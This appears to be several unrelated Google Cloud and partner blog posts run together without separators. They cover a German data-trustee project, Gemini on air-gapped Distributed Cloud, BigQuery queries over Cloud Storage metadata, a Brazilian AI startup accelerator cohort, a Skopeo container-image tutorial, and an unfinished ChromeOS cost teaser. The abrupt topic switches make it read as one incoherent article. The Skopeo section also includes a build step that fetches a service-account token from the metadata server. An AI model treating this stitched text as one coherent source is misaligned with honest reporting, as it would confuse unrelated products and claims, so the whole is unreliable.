On behalf of the German federal government, the consulting firm d-fine has now shown how health data can be used with the help of EuroDaT, for example to analyze the impact of post-COVID conditions on employment. To do this, the health data has to be combined with employment data that is also highly sensitive, which EuroDaT makes possible: as the data trustee, we ensure that the data remains confidential and can still be put to meaningful use.
Data sovereignty as the key to digital collaboration
When data cannot simply be shared, there are usually good reasons for it. In finance and healthcare in particular, data protection and confidentiality are non-negotiable. That makes it all the more important that, when an exchange of this data does become necessary, it can take place in a legally sound and controlled way.
As a data trustee, we therefore not only enable secure data exchange in sensitive industries but also strengthen the data sovereignty of everyone involved. Together with Google Cloud, we are anchoring data protection firmly at the core of digital collaboration between companies, public authorities, and research institutions.
For years, enterprises and governments with the strictest data security and sovereignty requirements have faced a difficult choice: adopt modern AI or protect their data. Today, that compromise ends. We are announcing the general availability of Gemini on GDC air-gapped and preview of Gemini on GDC connected, bringing Google’s most advanced models directly into your data center.
We are inspired by initial feedback from customers, including Singapore’s Centre for Strategic Infocomm Technologies (CSIT), Government Technology Agency of Singapore (GovTech Singapore), Home Team Science and Technology Agency (HTX), KDDI, and Liquid C2, who are excited to gain the advantages of generative AI with Gemini on GDC.
Transformative AI capabilities, on-premises
Gemini models offer groundbreaking capabilities, from processing extensive context to native multimodal understanding of text, images, audio, and video. This unlocks a wide array of high-impact use cases on secure infrastructure:
Unlock new markets and global collaboration: Instantly break down language barriers across your international operations, creating a more connected and efficient global workforce.
Accelerate decision-making: Make faster, data-driven decisions by using AI to automatically summarize documents, analyze sentiment, and extract insights from your proprietary datasets.
Improve employee efficiency and customer satisfaction: Deliver instant, 24/7 support and enhance user satisfaction by developing intelligent chatbots and virtual assistants for customers and employees.
Increase development velocity: Ship higher-quality software faster by using Gemini for automated code generation, intelligent code completion, and proactive bug detection.
Strengthen safety & compliance: Protect your users with AI-powered safety tools that automatically filter harmful content and ensure adherence to industry policies.
Secure AI infrastructure where you need it
It takes more than just a model to drive business value with generative AI; you need a complete platform that includes scalable AI infrastructure, a library with the latest foundational models, high-performance inferencing services, and pre-built AI agents like Agentspace search. GDC provides all that and more with an end-to-end AI stack combining our latest-generation AI infrastructure with the power of Gemini models to accelerate and enhance all your AI workloads.
Delivering these transformative capabilities securely requires a complete, end-to-end platform that only Google provides today:
Performance at scale: GDC utilizes the latest NVIDIA GPU accelerators, including the NVIDIA Hopper and Blackwell GPUs. A fully managed Gemini endpoint is available within a customer or partner data center, featuring a seamless, zero-touch update experience. High performance and availability are maintained through automatic load balancing and auto-scaling of the Gemini endpoint, which is handled by our L7 load balancer and advanced fleet management capabilities.
Foundation of security and control: Security is a core component of our solution, with audit logging and access control capabilities that provide full transparency for customers. This allows them to monitor all data traffic in and out of their on-premises AI environment and meet strict compliance requirements. The platform also features Confidential Computing support for both CPUs (with Intel TDX) and GPUs (with NVIDIA’s confidential computing) to secure sensitive data and prevent tampering or exfiltration.
Flexibility and speed for your AI strategy: The platform supports a variety of industry-leading models, including Gemini 2.5 Flash and Pro, Vertex AI task-specific models (translation, optical character recognition, speech-to-text, and embeddings generation), and Google’s open-source Gemma models. GDC also provides managed VM shapes (A3 & A4 VMs) and Kubernetes clusters, giving customers the ability to deploy any open-source or custom AI model and custom AI workloads of their choice. This is complemented by Vertex AI services that provide an end-to-end AI platform, including a managed serving engine, data connectors, and pre-built agents like Agentspace search (in preview) for a unified search experience across on-premises data.
What our customers are saying
“As a key GDC collaboration partner in shaping the GDC air-gapped product roadmap and validating the deployment solutions, we’re delighted that this pioneering role has helped us grow our cutting-edge capabilities and establish a proven deployment blueprint that will benefit other agencies with similar requirements. This is only possible with the deep, strategic collaboration between CSIT and Google Cloud. We’re also excited about the availability of Gemini on GDC, and we look forward to building on our partnership to develop and deploy agentic AI applications for our national security mission.” – Loh Chee Kin, Deputy Chief Executive, Centre for Strategic Infocomm Technologies (CSIT)
“One of our priorities is to harness the potential of AI while ensuring that our systems and the services citizens and businesses rely on remain secure. Google Cloud has demonstrated a strong commitment to supporting the public sector with initiatives that enable the agile and responsible adoption of AI. We look forward to working more closely with Google Cloud to deliver technology for the public good.” – Goh Wei Boon, Chief Executive, Government Technology Agency of Singapore
“The ability to deploy Gemini on Google Distributed Cloud will allow us to bridge the gap between our on-premises data and the latest advancements in AI. Google Distributed Cloud gives us a secure, managed platform to innovate with AI, without compromising our strict data residency and compliance requirements.” – Ang Chee Wee, Chief AI Officer, Home Team Science & Technology Agency (HTX)
“The partnership with Google Cloud and the integration of Google’s leading Gemini models will bring cutting-edge AI capabilities, meet specific performance requirements, address data locality and regulatory needs of Japanese businesses and consumers.” – Toru Maruta, Executive Officer, Head of Advancing Business Platform Division, KDDI
“Data security and sovereignty are paramount for our customers. With Gemini on Google Distributed Cloud, our Liquid Cloud and Cyber Security solution would deliver strategic value to ensure our customers in highly regulated industries can harness the power of AI while keeping their most valuable data under their control.” – Oswald Jumira, CEO Liquid C2
Managing vast amounts of data in cloud storage can be a challenge. While Google Cloud Storage offers strong scalability and durability, storage admins sometimes struggle with questions like:
What’s driving my storage spend?
Where is all my data in Cloud Storage and how is it distributed?
How can I search across my data for specific metadata such as age or size?
Indeed, to achieve cost optimization, security, and compliance, you need to understand what you have, where it is, and how it’s being used. That’s where Storage Insights datasets, a feature of Storage Intelligence for Cloud Storage, comes in. Storage Intelligence is a unified management product that offers multiple powerful capabilities for analyzing large storage estates and easily taking action. It helps you explore your data, optimize costs, enforce security, and implement governance policies. Storage Insights datasets help you deeply analyze your storage footprint, and you can use Gemini Cloud Assist for quick analysis in natural language. Based on these analyses, you can take action, such as relocating buckets and performing large-scale batch operations.
In this blog, we focus on how you can use Insights datasets for cost management and visibility, exploring a variety of common use cases. This is especially useful for cloud administrators and FinOps teams performing cloud cost allocation, monitoring and forecasting.
What are Storage Insights datasets?
Storage Insights datasets provide a powerful, automated way to gain deep visibility into your Cloud Storage data. Instead of manual scripts, custom one-off reports for buckets or managing your own collection pipelines, Storage Insights datasets generate comprehensive reports about your Cloud Storage objects and their activities, placing them directly in a BigQuery linked dataset.
Think of it as X-ray vision for your Cloud Storage buckets. It transforms raw storage metadata into structured, queryable data that you can analyze with familiar BigQuery tools to gain crucial insights, with automatic data refreshes delivered every 24 hours (after the initial setup, which could take up to 48 hours for the first load).
Key features
Customizable scope: Set the dataset scope to be at the level of the organization, a folder containing projects, a project / set of projects, or a specific bucket.
Metadata dataset: It provides a queryable dataset that contains bucket and object metadata directly in BigQuery.
Regular updates and retention: After the first load, datasets update with metadata every 24 hours and can retain data for up to 90 days.
Use cases
Calculate routine showback
Understanding which teams or applications are consuming what storage is often the first step in effective cost management, especially for larger organizations. With Storage Insights datasets, your object and bucket metadata is available in BigQuery. You can run SQL queries to aggregate storage consumption by specific teams, projects, or applications. You can then attribute storage consumption by buckets or prefixes for internal chargeback or cost attribution, for example: “Department X used 50TB of storage in gs://my-app-data/department-x/ last month”. This transparency fosters accountability and enables accurate internal showback.
Here’s an example SQL query to determine the total storage per bucket and prefix in the dataset:
SELECT
  bucket,
  SPLIT(name, '/')[OFFSET(0)] AS top_level_prefix,
  SUM(size) AS total_size_bytes
FROM
  object_attributes_view
GROUP BY
  bucket, top_level_prefix
ORDER BY
  total_size_bytes DESC;

Note: Running queries on datasets accrues BigQuery query costs; refer to the pricing details page for further details.
Understand how much data you have across storage classes
Storage Insights datasets identify the storage class of every object in your buckets. By querying storageClass, timeCreated, and updated in the object metadata view in BigQuery, you can quickly visualize your data distribution across the various classes (standard, nearline, coldline, archive) for objects beyond a certain age, as well as when they were last updated. This lets you identify potentially misclassified data. It also provides valuable insights into whether you have entire buckets of coldline or archived data, or whether your objects unexpectedly moved across storage classes (for example, a file expected to be in archive is now in standard class), using the timeStorageClassUpdated object metadata.
Here’s an example SQL query to see all objects created two years ago, without any updates since and in standard class:
SELECT
  bucket,
  name,
  size,
  storageClass,
  timeCreated,
  updated
FROM
  object_attributes_latest_snapshot_view
WHERE
  EXTRACT(YEAR FROM timeCreated) = EXTRACT(YEAR FROM DATE_SUB(CURRENT_DATE(), INTERVAL 24 MONTH))
  AND (updated IS NULL OR updated = timeCreated)
  AND storageClass = 'STANDARD'
ORDER BY
  timeCreated;

Note: Running queries on datasets accrues BigQuery query costs; refer to the pricing details page for further details.
Set lifecycle and autoclass policies: Automating your savings
Manual data management is time-consuming and prone to error. Storage Insights datasets helps you identify where the use of Object Lifecycle Management (OLM) or Autoclass might reduce costs.
Locate the buckets that don’t have OLM or Autoclass configured: Through Storage Insights datasets, you can query bucket metadata to see which buckets lack defined lifecycle policies by using the lifecycle and autoclass.enabled fields. If a bucket contains data that should naturally transition to colder storage or be deleted after a certain period, but has no policy, you know which parts of your estate to investigate further and can take the appropriate action. Storage Insights datasets provide the data to flag these “unmanaged” buckets, helping you enforce best practices.
Here’s an example SQL query to see all buckets with lifecycle or autoclass configurations enabled and all those without any active configuration:
SELECT
  name AS bucket_name,
  storageClass AS default_class,
  CASE
    WHEN lifecycle = TRUE OR autoclass.enabled = TRUE THEN 'Managed'
    ELSE 'Unmanaged'
  END AS lifecycle_autoclass_status
FROM
  bucket_attributes_latest_snapshot_view

Note: Running queries on datasets accrues BigQuery query costs; refer to the pricing details page for further details.
Evaluate Autoclass impact: Autoclass automatically transitions objects between storage classes based on fixed access-time thresholds. But how do you know if it's working as expected or if further optimization is needed? With Storage Insights datasets, you can find the buckets with Autoclass enabled using the autoclass.enabled field and analyze object metadata by tracking the storageClass and timeStorageClassUpdated fields over time for specific objects within Autoclass-enabled buckets. This lets you evaluate the effectiveness of Autoclass, verify that objects are indeed moving to optimal classes, and understand the real-world impact on your costs. For example, once you configure Autoclass on a bucket, you can visualize how your data has moved between storage classes on day 31 compared to day 1 and understand how Autoclass takes effect on your bucket.
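Here's an example SQL query (a sketch; the bucket name is a placeholder and the field names follow the examples above) to list objects in an Autoclass-enabled bucket whose storage class changed in the last 30 days:
SELECT
  name,
  storageClass,
  timeStorageClassUpdated
FROM object_attributes_latest_snapshot_view
WHERE
  bucket = 'my-autoclass-bucket'  -- placeholder bucket name
  AND timeStorageClassUpdated >= TIMESTAMP_SUB(CURRENT_TIMESTAMP(), INTERVAL 30 DAY)
ORDER BY
  timeStorageClassUpdated DESC;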
Evaluate Autoclass suitability: Analyze a bucket's data to determine whether Autoclass is appropriate for it. For example, if a bucket mostly holds short-lived data (objects deleted within 30 days), Autoclass may not be worthwhile; you can assess objects in daily snapshots using timeCreated and timeDeleted to determine the average lifetime of an object in the bucket.
Here’s an example SQL query to find a count of all objects with age more than 30 days and age less than 30 days in bucketA and bucketB:
SELECT
  SUM(CASE WHEN TIMESTAMP_DIFF(t1.timeDeleted, t1.timeCreated, DAY) < 30 THEN 1 ELSE 0 END) AS age_less_than_30_days,
  SUM(CASE WHEN TIMESTAMP_DIFF(t1.timeDeleted, t1.timeCreated, DAY) > 30 THEN 1 ELSE 0 END) AS age_more_than_30_days
FROM
  `object_attributes_view` AS t1
WHERE
  t1.bucket IN ('bucketA', 'bucketB')
  AND t1.timeCreated IS NOT NULL
  AND t1.timeDeleted IS NOT NULL;
-- Note: Running queries against datasets accrues BigQuery query costs; refer to the pricing details page for further details.
Proactive cleanup and optimization
Beyond routine management, Storage Insights datasets can help you proactively find and eliminate wasted storage.
Quickly find duplicate objects: Accidental duplicates are a common cause of wasted storage. You can use object metadata like size, name or even crc32c checksums in your BigQuery queries to identify potential duplicates. For example, finding multiple objects with the exact same size, checksum and similar names might indicate redundancy, prompting further investigation.
Here's an example SQL query to list all objects that share the same name, size, and crc32c checksum (indicating potential duplicates):
SELECT
  name,
  bucket,
  timeCreated,
  crc32c,
  size
FROM (
  SELECT
    name,
    bucket,
    timeCreated,
    crc32c,
    size,
    COUNT(*) OVER (PARTITION BY name, size, crc32c) AS duplicate_count
  FROM
    `object_attributes_latest_snapshot_view` )
WHERE
  duplicate_count > 1
ORDER BY
  size DESC;
-- Note: Running queries against datasets accrues BigQuery query costs; refer to the pricing details page for further details.
Find temporary objects to be cleaned up: Many applications generate temporary files that, if not deleted, accumulate over time. Storage Insights datasets allows you to query for objects matching specific naming conventions (e.g., *_temp, *.tmp), or located in “temp” prefixes, along with their creation dates. This enables you to systematically identify and clean up orphaned temporary data, freeing up valuable storage space.
Here's an example SQL query to find all log files created more than a month ago:
SELECT
  name, bucket, timeCreated, size
FROM
  object_attributes_latest_snapshot_view
WHERE
  name LIKE '%.log'
  AND DATE(timeCreated) <= DATE_SUB(CURRENT_DATE(), INTERVAL 1 MONTH)
ORDER BY
  size DESC;
-- Note: Running queries against datasets accrues BigQuery query costs; refer to the pricing details page for further details.
List all objects older than a certain date for easy actioning: Need to archive or delete all images older than five years for compliance? Or perhaps you need to clean up logs that are older than 90 days? Storage Insights datasets provides timeCreated and contentType for every object. A simple BigQuery query can list all objects older than your specified date, giving you a clear, actionable list of objects for further investigation. You can then use Storage Intelligence batch operations, which lets you act on billions of objects in a serverless manner.
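Here's an example SQL query (a sketch; the five-year image cutoff simply follows the compliance example above) to list all image objects older than five years:
SELECT
  name,
  bucket,
  contentType,
  timeCreated,
  size
FROM object_attributes_latest_snapshot_view
WHERE
  contentType LIKE 'image/%'
  AND DATE(timeCreated) <= DATE_SUB(CURRENT_DATE(), INTERVAL 5 YEAR)
ORDER BY
  timeCreated;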
Check soft delete suitability: Find buckets that hold a large amount of soft-deleted data by querying for the presence of softDeleteTime and size in the object metadata tables. A high volume of soft-deleted data suggests the bucket's contents are largely temporary, and you may want to investigate soft delete cost optimization opportunities.
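Here's an example SQL query (a sketch, assuming softDeleteTime is populated only for soft-deleted objects) to rank buckets by the total size of soft-deleted data:
SELECT
  bucket,
  SUM(size) AS soft_deleted_bytes
FROM object_attributes_view
WHERE
  softDeleteTime IS NOT NULL
GROUP BY
  bucket
ORDER BY
  soft_deleted_bytes DESC;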
Taking your analysis further
The true power of Storage Intelligence Insights datasets lies not just in the raw data it provides, but in the insights you can derive and the subsequent actions you can take. Once your Cloud Storage metadata is in BigQuery, the possibilities for advanced analysis and integration are vast.
For example, you can use Looker Studio, Google Cloud’s no-cost data visualization and dashboarding tool, to directly connect to your BigQuery Insights datasets, transforming complex queries into intuitive, interactive dashboards. Now you can:
Visualize cost trends: Create dashboards that show storage consumption by project, department, or storage class over time. This allows teams to easily track spending, identify spikes, and forecast future costs.
Track fast-growing buckets: Analyze the buckets with the most growth in the past week or month, and compare them against known projects for accurate cost attribution. Use Looker’s alerting capabilities to notify you when certain thresholds are met, such as a sudden increase in the total size of data in a bucket.
Set up custom charts for common analysis: For routine FinOps use cases (such as tracking buckets without OLM policies configured or objects past their retention expiration time), you can generate weekly reports to relevant teams for easy actioning.
You can also use our template here to connect to your dataset for quick analysis or you can create your own custom dashboard.
Get started
Configure Storage Intelligence and create your dataset to start analyzing your storage estate via a 30-day trial today. Please refer to our pricing documentation for cost details.
Set up your dataset at a scope of your choosing and start analyzing your data:
Configure a set of Looker Studio dashboards based on team or departmental usage for monthly analysis by the central FinOps team.
Use BigQuery for ad-hoc analysis and to retrieve specific insights.
For a complete cost picture, you can integrate your Storage Insights dataset with your Google Cloud billing export to BigQuery. Your billing export provides granular details on all your Google Cloud service costs, including Cloud Storage.
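For example, here's a sketch of a query against the standard billing export table (the table name is a placeholder) that totals Cloud Storage cost per project over the last 30 days, which you can then compare with the consumption you see in your Insights dataset:
SELECT
  project.id AS project_id,
  SUM(cost) AS cloud_storage_cost
FROM
  `my-project.billing_dataset.gcp_billing_export_v1_XXXXXX`  -- placeholder billing export table name
WHERE
  service.description = 'Cloud Storage'
  AND usage_start_time >= TIMESTAMP_SUB(CURRENT_TIMESTAMP(), INTERVAL 30 DAY)
GROUP BY
  project_id
ORDER BY
  cloud_storage_cost DESC;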
In a landscape where AI is an engine of growth for the Latin American economy, Brazil stands out as a leader in innovation. Google is committed to supporting and shaping the future of AI startups, and our new accelerator cohort is proof of that.
Following a highly competitive selection process, we are proud to announce 11 startups that will participate in the AI First program. This group of entrepreneurs represents the vanguard of digital transformation in the country, with innovative solutions that apply AI to solve challenges in diverse industries, from the financial and health sectors to marketing and agriculture.
What’s next: During the program, which kicks off on September 2nd, the startups will receive personalized technical and strategic support, with access to Google’s top AI experts.
Meet the new cohort of the Google for Startups Accelerator: AI First
BrandLovers: This creator marketing platform uses AI to orchestrate campaigns, connecting brands with a network of over 300,000 influencers. Its smart technology optimizes the connection, ensuring that brands reach the right audience and achieve effective results in their marketing strategies.
Core AI: Core AI transforms industrial ecosystems into scalable credit platforms. By enabling SaaS companies to offer automated, AI-driven credit products, the startup is revolutionizing how credit is made available in the market.
Courageous Land: An agribusiness startup that uses the Agroforestry Intelligence platform to regenerate degraded landscapes through agroforestry. The technology optimizes carbon removal and organic production, contributing to sustainability and the fight against climate change.
Inspira: Inspira is an AI-powered legal platform created by lawyers, for lawyers. It provides reliable technology to keep law firms ahead, automating tasks and offering insights for strategic decision-making.
Jota: An AI platform that automates the finances and operations of entrepreneurs, boosting profitability. With a recent $60 million funding round, Jota is one of the highlights of this cohort, showcasing the potential of Brazilian AI startups.
Oncodata: This healthtech company develops AI-powered digital pathology solutions to accelerate cancer diagnosis and expand access to health services across Latin America, bringing hope and efficiency to the sector.
Paggo: A fintech company that is transforming how construction companies in Brazil manage their finances, automating payables, receivables, and treasury. Paggo’s solution increases financial efficiency and transparency in a traditionally complex sector.
Rivio: Rivio automates hospital billing with AI, reducing denials and delays through ERP integration and intelligent claim analysis. The startup is essential for optimizing the financial and operational processes of hospitals.
Tivita: Tivita helps healthcare providers thrive by putting their back-office management on autopilot. The platform optimizes administrative routines, allowing healthcare professionals to focus on what truly matters: patient care.
Vöiston: A healthtech company that uses AI to analyze and understand unstructured clinical data, addressing complex challenges in the healthcare sector. Vöiston is at the forefront of medical innovation, helping to uncover valuable insights.
Yuna: Yuna develops an AI-driven platform for personalized, interactive, and free children’s stories. The startup is reinventing how children engage with reading, promoting learning and creativity.
Get started
To learn more about the Google for Startups program, visit our homepage.
Managing container images effectively is crucial for modern application development and deployment, especially in Cloud environments. Popular tools like Docker are commonly used to pull, push, and inspect container images. However, the reliance on a running daemon can be a drawback for CI/CD pipelines or straightforward tasks like image inspection. Enter Skopeo, a versatile command-line utility designed to work with container images and registries without needing a daemon.
Let’s explore 5 key ways Skopeo can simplify and enhance your container image workflows within the Google Cloud ecosystem. This will focus on interactions with Artifact Registry, Google Cloud’s fully managed service for storing, managing, and securing container images and other packages.
What is Skopeo?
Skopeo is an open-source command-line tool specifically designed for operating on container images and image repositories. Its primary advantage lies in its daemonless operation; unlike the standard Docker client, it doesn’t require a background Docker daemon to function. Even in an environment like Google Cloud Build where a Docker daemon is available, this provides a key benefit: Skopeo can interact directly with container registries. This avoids the overhead of first pulling an image to the build worker’s local Docker storage, making tasks like copying an image between two Artifact Registry repositories a more efficient, direct registry-to-registry transfer.
Why use Skopeo with Google Cloud?
Skopeo becomes particularly powerful when paired with Google Cloud services:
Artifact Registry management: Easily inspect, copy, and manage images within your Artifact Registry repositories.
Efficient image migration and copying: Seamlessly copy images between different Artifact Registry repositories (for example, promoting dev to prod), pull images from external public or private registries (like Docker Hub) into Artifact Registry, or even mirror external registries into your private Artifact Registry for security and availability.
Efficient inspection: Inspect image metadata (layers, labels, digests, environment variables, creation date) in Artifact Registry without pulling the entire image, saving significant time and bandwidth, especially in automation.
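The commands in this post rely on a handful of environment variables (the "Set Environmental Values" step referenced below). A minimal sketch with illustrative values, which you should replace with your own, might look like this:
# Illustrative values -- replace with your own project, region, and repository names
export PROJECT_ID="my-project-id"        # your Google Cloud project ID (placeholder)
export REGION="us-central1"              # Artifact Registry region (placeholder)
export REPO_NAME="dev-containers"        # source Artifact Registry repository (placeholder)
export IMAGE_NAME="nginx"                # image name used in the examples below
export IMAGE_TAG="stable-alpine"         # tag used in the examples below
export SOURCE_IMAGE="docker.io/library/nginx:${IMAGE_TAG}"  # public source image on Docker Hub (assumption)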
Next, configure gcloud to authenticate Docker (which Skopeo uses) with Artifact Registry in your chosen region. This allows Skopeo to push and pull images from your private registry.
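For example, a sketch of that configuration (the command registers a gcloud credential helper for your regional Artifact Registry host, which Docker and Skopeo can both use):
# Authenticate Docker (and therefore Skopeo) with Artifact Registry in your region
gcloud auth configure-docker "${REGION}-docker.pkg.dev"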
Ensure the Artifact Registry repository exists. If you haven’t created it yet, use the following command, replacing the variables with the values from the “Set Environmental Values” section of this post:
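A sketch of that command:
# Create a Docker-format Artifact Registry repository
gcloud artifacts repositories create "${REPO_NAME}" \
  --repository-format=docker \
  --location="${REGION}" \
  --project="${PROJECT_ID}" \
  --description="Repository for Skopeo examples"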
With these steps completed, your environment is ready to use Skopeo with Artifact Registry.
Skopeo use cases with Google Cloud
With authentication configured and environment variables set using the script above, let’s walk through common scenarios using the popular nginx image to illustrate 5 specific ways Skopeo streamlines workflows. The following commands use the variables like $PROJECT_ID, $REGION, $REPO_NAME, etc., that you just defined.
Our scenario: Imagine your organization relies on the official nginx image. To ensure stability, security, and compliance, you want to bring external dependencies like this into your own managed Artifact Registry. This allows you to control distribution internally, scan images with Google Cloud security tools, and prevent issues related to external registry rate limits or availability.
Here’s how Skopeo helps achieve this, step-by-step:
1. Inspecting the source image (Verification)
Before importing an external image, it's crucial to verify its contents and metadata. Is it the official image? What architecture does it support? Does it have expected labels or exposed ports? Inspecting without pulling saves time and bandwidth, especially in automated pre-flight checks.
# Inspect the SOURCE_IMAGE on Docker Hub
skopeo inspect "docker://${SOURCE_IMAGE}"
Result: JSON output confirming details like layers, architecture, digest, and creation date.
If the command above fails with an architecture mismatch error like “no image found in image index for architecture…”, it’s because the image doesn’t have a manifest specifically for your host OS/architecture (e.g., macOS on ARM64). Skopeo defaults to matching your host. To resolve this, specify a target platform that is available in the image, like linux/amd64 or linux/arm64, using --override-os and --override-arch as shown in the following alternative command:
# Alternative: Inspect specifying a common platform (e.g., linux/amd64) if the above fails
skopeo inspect --override-os linux --override-arch amd64 "docker://${SOURCE_IMAGE}"
Result: JSON output confirming details for the specified linux/amd64 platform.
2. Copying the image to Artifact Registry (Internalization & control)
Copying the verified image into your private Artifact Registry is crucial for taking control of its distribution and management. Using the --all flag ensures that the entire manifest list and all associated architecture-specific images are copied, making all supported platforms available internally. This internal copy becomes the canonical source for your organization's builds and deployments, ensures consistent availability, allows integration with internal security scanning (like Artifact Analysis), and avoids external registry dependencies during critical operations.
# Copy the SOURCE_IMAGE with ALL architectures to your Artifact Registry
skopeo copy --all "docker://${SOURCE_IMAGE}" \
  "docker://${REGION}-docker.pkg.dev/${PROJECT_ID}/${REPO_NAME}/${IMAGE_NAME}:${IMAGE_TAG}"
Output: Shows the manifest list and associated images being efficiently transferred to your secure, managed registry.
3. Listing available image tags in Artifact Registry (Confirmation)
After copying, you need to confirm that the image and the specific tag (stable-alpine in this case) are now available within your internal registry. This step is essential for validating CI/CD pipeline steps or simply ensuring the image is ready for internal consumption.
# List tags for the IMAGE_NAME within your REPO_NAME to confirm the copy
skopeo list-tags "docker://${REGION}-docker.pkg.dev/${PROJECT_ID}/${REPO_NAME}/${IMAGE_NAME}"
Result: A list of tags for nginx in your repository, which should now include stable-alpine.
4. Copying between Artifact Registry repositories (Promotion)
A common workflow is promoting images between different environments (e.g., dev to prod). Skopeo makes it easy to copy images between repositories within Artifact Registry. Assuming you have another repository, say prod-containers, you can copy the image there. Using --all ensures all architectures are copied.
Note: You would need to create the prod-containers repository first using a similar gcloud artifacts repositories create command as shown in the setup.
# Define the destination "prod" repository and image path
export PROD_REPO_NAME="prod-containers"  # Example name, ensure this repo exists
export DEST_IMAGE_AR="docker://${REGION}-docker.pkg.dev/${PROJECT_ID}/${PROD_REPO_NAME}/${IMAGE_NAME}:${IMAGE_TAG}"
export SOURCE_IMAGE_AR="docker://${REGION}-docker.pkg.dev/${PROJECT_ID}/${REPO_NAME}/${IMAGE_NAME}:${IMAGE_TAG}"

# Copy the image with ALL architectures from the source AR repo to the prod AR repo
skopeo copy --all "${SOURCE_IMAGE_AR}" "${DEST_IMAGE_AR}"
Output: Shows the manifest list and associated images being efficiently transferred between your Artifact Registry repositories.
5. Verifying the promoted image with Cloud Build (Automated verification)
After promoting an image (as in step 4), automated verification is crucial in CI/CD pipelines. Instead of manual inspection, we can use Cloud Build with Skopeo to programmatically verify the image exists and is accessible in the destination repository (e.g., prod-containers). This demonstrates integrating Skopeo into an automated workflow.
5a. Grant Permissions: Grant the roles/artifactregistry.reader role to your project's Cloud Build service account for the production repository.
# Get the project number (needed for the service account email)
export PROJECT_NUMBER=$(gcloud projects describe "${PROJECT_ID}" --format='value(projectNumber)')
export CLOUD_BUILD_SA_EMAIL="${PROJECT_NUMBER}@cloudbuild.gserviceaccount.com"

# Grant the Artifact Registry Reader role to the Cloud Build SA for the PROD repo
gcloud artifacts repositories add-iam-policy-binding "${PROD_REPO_NAME}" \
  --location="${REGION}" \
  --member="serviceAccount:${CLOUD_BUILD_SA_EMAIL}" \
  --role="roles/artifactregistry.reader" \
  --project="${PROJECT_ID}" --quiet
5b. Create Cloud Build Configuration: Create a cloudbuild.yaml file with the following steps.
Note: This build uses Skopeo to inspect the image, authenticating via a short-lived token generated from the build service account’s credentials.
steps:
- name: 'quay.io/skopeo/stable:latest' # Using an official Skopeo image
  entrypoint: 'bash'
  args:
  - '-c'
  - |
    echo "Attempting skopeo inspect on promoted image..."
    AR_TOKEN=$$(curl -s -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" | sed -n 's/.*"access_token":"\([^"]*\)".*/\1/p')
    # Use --override flags as Skopeo runs in a Linux container
    skopeo inspect --registry-token "$${AR_TOKEN}" \
      --override-os linux \
      --override-arch amd64 \
      "docker://${_REGION}-docker.pkg.dev/${PROJECT_ID}/${_PROD_REPO_NAME}/${_IMAGE_NAME}:${_IMAGE_TAG}"
  id: 'Inspect-Promoted-Image'
# Define substitutions required by the build steps
# These will be populated by the gcloud builds submit command
substitutions:
  _PROD_REPO_NAME: 'prod-containers'
  _IMAGE_NAME: 'nginx'
  _IMAGE_TAG: 'stable-alpine'
  _REGION: 'us-central1'
Note: Ensure you have this cloudbuild.yaml file in your current directory or specify its path when submitting the build.
5c. Trigger the Cloud Build: Execute the following command to submit the build. Note that this command uses the shell variables (like $PROD_REPO_NAME, $IMAGE_NAME, etc.) defined earlier in the setup section to provide values for the Cloud Build substitutions (which must start with _).
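A sketch of that command, assuming cloudbuild.yaml is in the current directory and the variables from the earlier steps are still set (the --no-source flag is used because the build only needs the config file):
# Submit the verification build; custom substitution keys must start with an underscore
gcloud builds submit --no-source \
  --config="cloudbuild.yaml" \
  --project="${PROJECT_ID}" \
  --substitutions=_PROD_REPO_NAME="${PROD_REPO_NAME}",_IMAGE_NAME="${IMAGE_NAME}",_IMAGE_TAG="${IMAGE_TAG}",_REGION="${REGION}"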
Result: The Cloud Build logs will show the output of the skopeo inspect command, confirming the image details in the production repository. A successful build indicates the image is present and accessible.
These 5 steps illustrate how Skopeo, from simple inspection to integration within automated Cloud Build workflows, streamlines essential container image management tasks in Google Cloud, particularly with Artifact Registry.
Integrating with Google Cloud services
Skopeo’s lightweight design makes it easy to use across various Google Cloud services where container image operations are needed. Here’s how it fits into common Google Cloud environments:
Cloud Shell: Provides an ideal interactive environment for running Skopeo commands manually, benefiting from pre-configured authentication.
Compute Engine / GKE nodes: You can install Skopeo directly onto Compute Engine VMs or within container images running on GKE nodes. This allows for scripting image management tasks, with authentication typically handled via service accounts attached to the VM or node pool, or through securely mounted secrets.
Cloud Workstations: Include Skopeo in your developer toolchain by adding it to a shared custom Cloud Workstation image.
Cloud Build: You can use Skopeo directly in a build step (either by installing it or using a container image that includes it) to copy, inspect, or manipulate images, relying on the build service account for authentication with Artifact Registry.
Cloud Run / GKE runtime: While Skopeo itself isn’t typically part of the runtime services, it plays a crucial role upstream by managing the container images stored in Artifact Registry that these services pull and execute. Ensuring the correct, vetted images are available in the registry is where Skopeo’s management capabilities support reliable deployments.
Supporting security workflows
Skopeo can also play a role in reinforcing your security posture for container images. Its inspect command is useful for fetching image digests or other metadata, which can then be fed into vulnerability scanning tools or used by policy checkers as part of your CI/CD pipeline, ensuring that only compliant images proceed.
While Google Cloud’s Binary Authorization primarily verifies attestations about images (often created using gcloud or Cloud KMS), Skopeo does have capabilities related to image signing (skopeo copy --sign-by ...). This means Skopeo can be used to transport images that might already contain signatures according to formats like Sigstore’s Cosign, or to inspect signature information if it’s embedded within the image manifest.
However, its main contribution to security workflows in a GCP context is typically providing the necessary image metadata and facilitating the movement of images that are then verified by other dedicated security services like Binary Authorization.
Conclusion
Skopeo is an invaluable addition to any container developer’s toolkit, especially within the Google Cloud ecosystem. Its daemonless nature, combined with powerful commands for inspecting, copying, deleting, and exporting images, makes it excellent for interacting with Artifact Registry. It shines in automating CI/CD tasks within Cloud Build, simplifying image migrations, and enabling efficient image management without the overhead of a Docker daemon.
By integrating Skopeo into your workflows, you can achieve more efficient, streamlined, and scriptable container management on Google Cloud. Give it a try!
In today’s dynamic business landscape, organizations are continuously challenged to achieve more with fewer resources. The demand is high for technology that is not only powerful but also economical, simple to manage, and secure. Enter ChromeOS, a cloud-first operating system designed to meet these exact needs by enhancing security, boosting employee productivity, and significantly cutting IT costs.
ChromeOS usage can lead to a substantial decrease in the total cost of ownership (TCO) associated with device usage at an organization. But don’t just take our word for it— research quantifies these benefits.
The Forrester Total Economic Impact™ Study: Quantifying the Value of ChromeOS
Google commissioned Forrester Consulting to conduct a comprehensive Total Economic Impact™ (TEI) study to evaluate the potential return on investment (ROI) for enterprises deploying ChromeOS. This study provides a robust framework for understanding the financial impact ChromeOS can have on organizations.
